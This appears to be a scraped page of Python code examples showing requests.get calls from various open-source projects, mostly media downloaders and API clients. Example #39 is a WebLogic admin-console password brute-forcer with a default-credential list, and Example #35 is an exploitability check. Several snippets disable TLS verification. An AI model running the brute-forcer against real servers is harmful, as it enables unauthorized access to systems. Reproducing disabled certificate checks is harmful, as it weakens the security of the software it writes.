    for url, quality in matches:
        url = "http://217.160.176.9/comun/videos/" + urllib.quote(url)
        for url_sub, label in subs:
            url_sub = host + urllib.quote(url_sub)
            label = label.encode('iso-8859-1').decode('utf8')
            title = "Ver video en [[COLOR green]" + quality + "[/COLOR]] " + "Sub " + label
            itemlist.append(
                Item(channel=__channel__,
                     action="play",
                     server="directo",
                     title=bbcode_kodi2html(title),
                     url=url,
                     thumbnail=item.thumbnail,
                     plot=item.plot,
                     subtitle=url_sub,
                     extra=item.url,
                     fanart=item.fanart,
                     folder=False))

    return itemlist
Example #35
def verify(URL):
    r = requests.get(URL)
    r.close()
    if "Request" in r.content:
        logger.success("Step 1: Exploitable!")
    else:
        logger.error("Step 1: It's not exploitable!")
Example #36
    def getURL(self, url, headers=None):

        try:
            r = requests.get(url)
        except (requests.exceptions.ConnectionError, requests.exceptions.HTTPError) as e:
            logger.log(u"Error loading "+self.name+" URL: " + str(sys.exc_info()) + " - " + ex(e), logger.ERROR)
            return None
Example #37
    def pull(self, num):
        """Go fetch the paper boy!"""
        try:
            url = 'http://api.nytimes.com/svc/news/v3/content/nyt/u.s..json?&api-key=' + TopStories.key
            package = requests.get(url)
            newspaper = package.json()

        except:
            return False

        for article in newspaper['results']:
            if len(self.articles) < num:
                title = article['title']
                content = article['abstract']
                source_url = article['url']
                img_url = ''
                if title.lower().find('briefing') != -1:
                    continue
                for media_num in range(len(article['multimedia'])):
                    if article['multimedia'][media_num]['format'] == 'Normal':
                        img_url = article['multimedia'][media_num]['url']
                        break
                if img_url == '':
                    continue
                new_article = Article(title, content, img_url, source_url)
                self.articles.append(new_article)

        return self.articles
Example #38
def search(query, lang, max_hits):
    """Use Wikipedia's search API to find matches
    """
    # Convert Alfred's decomposed utf-8 to composed as expected by the endpoint
    q = unicodedata.normalize('NFC', query.decode('utf-8')).encode('utf-8')
    try:
        response = requests.get(
            url='https://{lang}.wikipedia.org/w/api.php'.format(lang=lang),
            params={'action': 'query',
                    'format': 'json',
                    'utf8': '',
                    # Build generator
                    'generator': 'search',
                    'gsrsearch': q,
                    'gsrlimit': max_hits,
                    # Get properties
                    'prop': 'extracts|info',
                    'explaintext': '',
                    'exintro': '',
                    'exlimit': 'max',
                    'inprop': 'url'})
        response.raise_for_status()  # Raise error on 4xx and 5xx status codes
        response = json.loads(response.content.decode('utf-8'))
        results = response['query']['pages'].values()
    except KeyError:
        raise ResultsException(query)
    except requests.exceptions.RequestException as e:
        raise RequestException(e.request)

    return results
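search raises ResultsException when no pages come back and RequestException on network failure, so a caller might look like this (a sketch; the query string is just an example, and 'fullurl' is the key MediaWiki returns for inprop=url):

    try:
        pages = search('alan turing', lang='en', max_hits=9)
    except ResultsException:
        pages = []
    for page in pages:
        print page['title'], page['fullurl']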
Example #39
def exploit(ip):
    result = []
    if Domain:
        for domain in Domain:
            try:
                login_url = domain+'/console/login/LoginForm.jsp'
                resp = requests.get(login_url, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
            except Exception as e:
                logging.error(e)
                continue
            if "WebLogic" in resp.text and dict(resp.headers).has_key('set-cookie'):
                result.append('%s >>>> WebLogic admin console found' % login_url)
                cookies={}
                for line in resp.headers['set-cookie'].split(';'):
                    if '=' in line:
                        name,value=line.strip().split('=',1)
                        cookies[name]=value
                flag_list=['<title>WebLogic Server Console</title>','javascript/console-help.js','WebLogic Server Administration Console Home','/console/console.portal','console/jsp/common/warnuserlockheld.jsp','/console/actions/common/']
                user_list=['weblogic']
                pass_list=['weblogic','password','Weblogic1','weblogic10','weblogic10g','weblogic11','weblogic11g','weblogic12','weblogic12g','weblogic13','weblogic13g','weblogic123','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root']
                for user in user_list:
                    for password in pass_list:
                        try:
                            login_url = domain+'/console/j_security_check'
                            data = {'j_username':user, 'j_password':password, 'j_character_encoding':'UTF-8'}
                            resp = requests.post(login_url, data=data, proxies=MY_PROXY, cookies=cookies, timeout=TIME_OUT, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
                        except Exception as e:
                            logging.error(e)
                            continue
                        # print resp.text
                        for flag in flag_list:
                            if flag in resp.text:
                                result.append('%s >>>> 存在Weblogic弱口令%s:%s'%(domain,user,password))
Example #40
    def getSOSProcedure(self, name):

        params = {
            'service': 'SOS',
            'version': '1.0.0',
            'request': 'GetObservation',
            'observedProperty': ':',
            'offering': 'temporary',
            'responseFormat': 'application/json',
            'procedure': name
        }

        print "Requesting %s GetObservation: %s/%s" % (name, self.host,
                                                       self.service)
        #print params

        res = req.get("%s/%s" % (self.host, self.service),
                      params=params,
                      auth=self.auth)

        #print res.json()

        member = res.json()['ObservationCollection']['member'][0]

        return member
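Usage is one call per procedure name; the return value is the first member of the SOS ObservationCollection. A sketch, assuming checker is a configured instance of the surrounding class:

    member = checker.getSOSProcedure('BELLINZONA')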
Example #41
    def getURL(self, url, headers=None):

        try:
            r = requests.get(url, verify=False)
        except (requests.exceptions.ConnectionError, requests.exceptions.HTTPError) as e:
            logger.log(u"Error loading " + self.name + " URL: " + str(sys.exc_info()) + " - " + ex(e), logger.ERROR)
            return None
Example #42
File: tmdb.py Project: chr1831/XDM
    def getJSON(self, url, language=None):
        language = language or config['language']
        page = requests.get(url, params={'language': language}).content
        try:
            return simplejson.loads(page)
        except:
            return simplejson.loads(page.decode('utf-8'))
Example #43
File: users.py Project: MCME/WebStatus
def fetch_yaml():
    '''fetches yaml file from mcmiddleearth,
       loads, parses, and returns python object'''
    response = requests.get(MCME_YAML_URL)
    raw_yaml = response.content
    response.close()
    return yaml.load(raw_yaml)
Example #44
File: TheGamesDB.py Project: chr1831/XDM
    def _searchForElement(self, term='', id=0):
        self.progress.reset()
        self._pCache = {}
        mt = MediaType.get(MediaType.identifier == 'de.lad1337.games')
        mtm = mt.manager
        rootElement = mtm.getFakeRoot(term)
        payload = {}
        url = 'http://thegamesdb.net/api/GetGame.php?'
        if term and not id:
            payload['name'] = term
        else:
            payload['id'] = id
        #r = requests.get('http://thegamesdb.net/api/GetGame.php', params=payload)
        r = requests.get(url, params=payload)
        log('tgdb search url ' + r.url)
        root = ET.fromstring(r.text.encode('utf-8'))

        baseImgUrlTag = root.find('baseImgUrl')
        if baseImgUrlTag is not None:
            base_url = baseImgUrlTag.text
        else:
            base_url = "http://thegamesdb.net/banners/"

        for curGame in root.getiterator('Game'):
            self._createGameFromTag(curGame, base_url, rootElement)

        log("%s found %s games" % (self.name, len(list(rootElement.children))))

        return rootElement
Example #45
File: web.py Project: HeyMan7/Code
def http(method, rdata='all', uri=None, timeout=7, params=None, data=None, headers=None, **kwargs):
    # raising a bare string is a TypeError on any modern Python, so use real exceptions
    if not method:
        raise ValueError('No method specified')
    if not uri:
        raise ValueError('Invalid URI supplied')
    if not headers:
        headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, '
                          'like Gecko) Chrome/22.0.1229.79 Safari/537.4',
            'Cache-Control': 'max-age=0',
            'Accept-Encoding': 'gzip,deflate,sdch',
            'X-Service': 'Code Python IRC Bot'
        }
    if method == 'get':
        response = requests.get(uri, timeout=timeout, params=params, headers=headers, **kwargs)
    elif method == 'post':
        response = requests.post(uri, timeout=timeout, data=data, headers=headers, **kwargs)
    elif method == 'head':
        response = requests.head(uri, timeout=timeout, data=data, headers=headers, **kwargs)
    else:
        raise ValueError('Method not supported')

    if rdata == 'all':
        return response
    elif rdata == 'json':
        return response.json()
    elif rdata == 'text':
        return response.text
    elif rdata == 'headers':
        return response.headers
    else:
        raise ValueError('Return data not supported')
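The rdata argument selects what the wrapper hands back, which keeps call sites to one line. A few illustrative calls (the URLs are placeholders):

    page_text = http('get', rdata='text', uri='https://example.com/')
    api_json = http('get', rdata='json', uri='https://api.example.com/items', params={'q': 'bot'})
    headers = http('head', rdata='headers', uri='https://example.com/')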
Example #46
File: mb.py Project: ChapeLu/mylar
def pullsearch(comicapi, comicquery, offset, explicit, type):
    u_comicquery = urllib.quote(comicquery.encode('utf-8').strip())
    u_comicquery = u_comicquery.replace(" ", "%20")

    if explicit == 'all' or explicit == 'loose':
        PULLURL = mylar.CVURL + 'search?api_key=' + str(comicapi) + '&resources=' + str(type) + '&query=' + u_comicquery + '&field_list=id,name,start_year,first_issue,site_detail_url,count_of_issues,image,publisher,deck,description&format=xml&page=' + str(offset)

    else:
        # 02/22/2014 use the volume filter label to get the right results.
        # add the 's' to the end of type to pluralize the caption (it's needed)
        if type == 'story_arc':
            u_comicquery = re.sub("%20AND%20", "%20", u_comicquery)
        PULLURL = mylar.CVURL + str(type) + 's?api_key=' + str(comicapi) + '&filter=name:' + u_comicquery + '&field_list=id,name,start_year,site_detail_url,count_of_issues,image,publisher,deck,description&format=xml&offset=' + str(offset) # 2012/22/02 - CVAPI flipped back to offset instead of page
    #all these imports are standard on most modern python implementations
    #logger.info('MB.PULLURL:' + PULLURL)

    #new CV API restriction - one api request / second.
    if mylar.CVAPI_RATE is None or mylar.CVAPI_RATE < 2:
        time.sleep(2)
    else:
        time.sleep(mylar.CVAPI_RATE)

    #download the file:
    payload = None
    verify = False

    try:
        r = requests.get(PULLURL, params=payload, verify=verify, headers=mylar.CV_HEADERS)
    except Exception as e:
        logger.warn('Error fetching data from ComicVine: %s' % (e))
        return
Example #47
def getRepositories(my_globals):
    from lib import requests
    from lib.requests.auth import HTTPBasicAuth

    url = my_globals["repo_api"]["url"]
    user = my_globals["repo_api"]["username"]
    password = my_globals["repo_api"]["password"]

    headers = {'Content-Type': "application/json", 'User-Agent': "setup tool"}

    req = requests.get(url,
                       headers=headers,
                       auth=HTTPBasicAuth(user, password))
    # from pprint import pprint
    # pprint(req)

    # p = urllib2.HTTPPasswordMgrWithDefaultRealm()
    # p.add_password(None, url, user, password)

    my_globals["repoJSON"] = req.json()

    # Pretty print for debugging
    # print json.dumps(my_globals["repoJSON"],
    #                    sort_keys=True,
    #                    indent=2, separators=(',', ': '))

    # save to file
    with open(os.environ['HOME'] + "/.PUNCH/current_beanstalk_repos.json",
              "w") as outFile:
        json.dump(my_globals["repoJSON"], outFile)

    # print repo names for user
    my_globals["allTitles"] = []
    for repo in my_globals["repoJSON"]:
        my_globals["allTitles"].append(repo["repository"]["title"])
    # print ", ".join(my_globals["allTitles"])
    # Columns!
    allTitles = my_globals["allTitles"]
    longestName = 0
    for name in allTitles:
        l = len(name)
        if l > longestName:
            longestName = l + 1

    colCount = int(math.floor(80 / longestName))
    rowCount = (len(allTitles) / colCount) + 1

    # Take the titles and split them into columns
    columns = [
        allTitles[i:i + rowCount] for i in range(0, len(allTitles), rowCount)
    ]

    # Equalize the lengths of the columns
    for i in range(1, colCount):
        while len(columns[i]) < len(columns[i - 1]):
            columns[i].append("")

    for row in zip(*columns):
        print "".join(str.ljust(str(i), longestName) for i in row)
Example #48
File: newpull.py Project: hjone72/mylar
def newpull():
    pagelinks = "http://www.previewsworld.com/Home/1/1/71/952"

    try:
        r = requests.get(pagelinks, verify=False)

    except Exception as e:
        logger.warn('Error fetching data: %s' % e)
Example #49
File: newpull.py Project: cerinthus/mylar
def newpull():
    pagelinks = "http://www.previewsworld.com/Home/1/1/71/952"

    try:
        r = requests.get(pagelinks, verify=False)

    except Exception as e:
        logger.warn("Error fetching data: %s" % e)
Example #50
    def getURL(self, url, post_data=None, headers=None):

        try:
            url = urljoin(url, urlparse(url).path.replace('//', '/'))
            response = requests.get(url, verify=False)
        except (requests.exceptions.ConnectionError, requests.exceptions.HTTPError) as e:
            logger.log(u"Error loading " + self.name + " URL: " + ex(e), logger.ERROR)
            return None
Example #51
File: scan.py Project: xuacker/Scanver
    def baiduce(self, target):
        try:
            res = requests.get('http://ce.baidu.com/index/getRelatedSites?site_address=%s' % target)
            res = json.loads(res.text)
            for subdomain in [v.get('domain') for v in res.get('data', [])]:
                for answer in self.recv(subdomain):
                    self.result.add((subdomain, answer.address))
        except:
            pass
Example #52
def get_res_tk(url):
    from lib import requests
    try:
        res = requests.get(url, timeout=1.5)
        print res.raise_for_status()
        return res
    except Exception:
        return None  # 'res' may be unbound here if the request itself failed
Example #53
    def _getWatchlist(self, watchURL, username, password, apikey):
        url = self._makeURL(watchURL, apikey, username)
        log.debug("Calling trakt url: %s" % url, censor={apikey: 'apikey', username: '******'})
        try:
            r = requests.get(url, auth=(username, self._hash(password)))
            return r.json()
        except:
            return []
Example #54
File: Sabnzbd.py Project: sinfuljosh/XDM
    def _getHistory(self):

        payload = {"apikey": self.c.apikey, "mode": "history", "output": "json"}
        r = requests.get(self._baseUrl(), params=payload)
        log("Sab hitory url %s" % r.url, censor={self.c.apikey: "apikey"})
        response = r.json()
        self._history = response["history"]["slots"]
        return self._history
Example #55
def getLatestVersion_FromGit():
    # Don't call directly, use getLatestVersion as wrapper.
    # Also removed reference to global variable setting.
    latest_version = 'Unknown'

    # Can only work for non Windows driven installs, so check install type
    if lazylibrarian.CONFIG['INSTALL_TYPE'] == 'win':
        logmsg('debug', '(getLatestVersion_FromGit) Error - should not be called under a windows install')
        latest_version = 'WINDOWS INSTALL'
    else:
        # check current branch value of the local git repo as folks may pull from a branch not master
        branch = lazylibrarian.CONFIG['GIT_BRANCH']

        if branch == 'InvalidBranch':
            logmsg('debug', '(getLatestVersion_FromGit) - Failed to get a valid branch name from local repo')
        else:
            if branch == 'Package':  # check packages against master
                branch = 'master'
            # Get the latest commit available from github
            url = 'https://api.github.com/repos/%s/%s/commits/%s' % (
                lazylibrarian.CONFIG['GIT_USER'], lazylibrarian.CONFIG['GIT_REPO'], branch)
            logmsg('debug',
                   '(getLatestVersion_FromGit) Retrieving latest version information from github command=[%s]' % url)

            timestamp = check_int(lazylibrarian.CONFIG['GIT_UPDATED'], 0)
            age = ''
            if timestamp:
                # timestring for 'If-Modified-Since' needs to be english short day/month names and in gmt
                # we already have english month names stored in MONTHNAMES[] but need capitalising
                # so use hard coded versions here instead
                DAYNAMES = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
                MONNAMES = ['', 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
                tm = time.gmtime(timestamp)
                age = "%s, %02d %s %04d %02d:%02d:%02d GMT" %(DAYNAMES[tm.tm_wday], tm.tm_mday,
                    MONNAMES[tm.tm_mon], tm.tm_year, tm.tm_hour, tm.tm_min, tm.tm_sec)
            try:
                headers = {'User-Agent': USER_AGENT}
                if age:
                    logmsg('debug', '(getLatestVersion_FromGit) Checking if modified since %s' % age)
                    headers.update({'If-Modified-Since': age})
                proxies = proxyList()
                timeout = check_int(lazylibrarian.CONFIG['HTTP_TIMEOUT'], 30)
                r = requests.get(url, timeout=timeout, headers=headers, proxies=proxies)

                if str(r.status_code).startswith('2'):
                    git = r.json()
                    latest_version = git['sha']
                    logmsg('debug', '(getLatestVersion_FromGit) Branch [%s] Latest Version has been set to [%s]' % (
                        branch, latest_version))
                elif str(r.status_code) == '304':
                    latest_version = lazylibrarian.CONFIG['CURRENT_VERSION']
                    logmsg('debug', '(getLatestVersion_FromGit) Not modified, currently on Latest Version')
            except Exception as e:
                logmsg('warn', '(getLatestVersion_FromGit) Could not get the latest commit from github')
                logmsg('debug', 'git %s for %s: %s' % (type(e).__name__, url, str(e)))
                latest_version = 'Not_Available_From_GitHUB'

    return latest_version
Example #56
    def processEpisode(self, dirName, nzbName=None, status=0, clientAgent='manual', inputCategory=None):
        # auto-detect correct section
        section = nzbtomedia.CFG.findsection(inputCategory)
        if not section:
            logger.error(
                "We were unable to find a section for category %s, please check your autoProcessMedia.cfg file." % inputCategory)
            return 1

        host = nzbtomedia.CFG[section][inputCategory]["host"]
        port = nzbtomedia.CFG[section][inputCategory]["port"]
        username = nzbtomedia.CFG[section][inputCategory]["username"]
        password = nzbtomedia.CFG[section][inputCategory]["password"]

        try:
            ssl = int(nzbtomedia.CFG[section][inputCategory]["ssl"])
        except:
            ssl = 0

        try:
            web_root = nzbtomedia.CFG[section][inputCategory]["web_root"]
        except:
            web_root = ""

        try:
            remote_path = nzbtomedia.CFG[section][inputCategory]["remote_path"]
        except:
            remote_path = None

        nzbName, dirName = convert_to_ascii(nzbName, dirName)

        params = {}
        params['nzb_folder'] = dirName
        if remote_path:
            dirName_new = os.path.join(remote_path, os.path.basename(dirName)).replace("\\", "/")
            params['nzb_folder'] = dirName_new

        if nzbName is not None:
            params['nzb_name'] = nzbName

        if ssl:
            protocol = "https://"
        else:
            protocol = "http://"

        url = "%s%s:%s%s/post_process" % (protocol, host, port, web_root)
        logger.debug("Opening URL: %s" % (url), section)

        try:
            r = requests.get(url, params=params, auth=(username, password), stream=True)
        except requests.ConnectionError:
            logger.error("Unable to open URL", section)
            return 1 # failure

        for line in r.iter_lines():
            if line: logger.postprocess("%s" % (line), section)

        time.sleep(60) #wait 1 minute for now... need to see just what gets logged and how long it takes to process
        return 0 # Success
Example #57
File: core.py Project: Bonekicker/SickRage
    def response(self):
        try:
            response = requests.get(str(self))
            rjson = response.json()
            if not isinstance(rjson, dict):
                raise Exception(response.text)
            return rjson
        except Exception as e:
            raise ResponseFanartError(str(e))